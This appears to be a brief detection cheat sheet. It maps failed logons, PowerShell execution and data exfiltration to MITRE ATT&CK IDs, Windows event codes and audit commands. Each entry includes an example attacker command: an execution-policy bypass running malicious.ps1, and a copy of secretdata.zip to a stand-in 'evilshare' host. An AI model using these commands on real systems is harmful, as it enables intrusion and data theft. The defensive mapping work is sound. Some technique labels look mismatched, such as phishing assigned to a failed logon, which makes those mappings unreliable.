Unauthorized Access Attempt:
ID: 001
MITRE Tactic & Techniques: Initial Access Phishing [T1566.001]
Event ID & Code: 4625 FAILED_LOGON
Status Code: 0x8007052e
Commands and Code: Auditpol /set /subcategory:”Logon” /success:enable
/failure:enable
Description: An attempt to log on with incorrect credentials was made.
Example Offensive Codes and Commands: net use \target-system\IPC$
/user:username wrongpassword
Malware Execution:
ID: 002
MITRE Tactic & Techniques:
Execution
Command and Scripting Interpreter
[T1059]
Event ID & Code: 4104 POWERSHELL_SCRIPT_EXECUTION
Status Code: N/A
Commands and Code: Set-ExecutionPolicy Unrestricted
Description: Execution of PowerShell script detected.
Example Offensive Codes and Commands: powershell -ep bypass -f
malicious.ps1
Data Exfiltration:
ID: 003
MITRE Tactic & Techniques: Exfiltration Data Compressed [T1560.001]
Event ID & Code: 5145 FILE_SHARE_ACCESS
Status Code: N/A
Commands and Code: netsh trace start capture=yes
Description: Unauthorized access to file share detected.
Example Offensive Codes and Commands: copy /Z secretdata.zip \evilshare\
stolen-data\
Views: 0
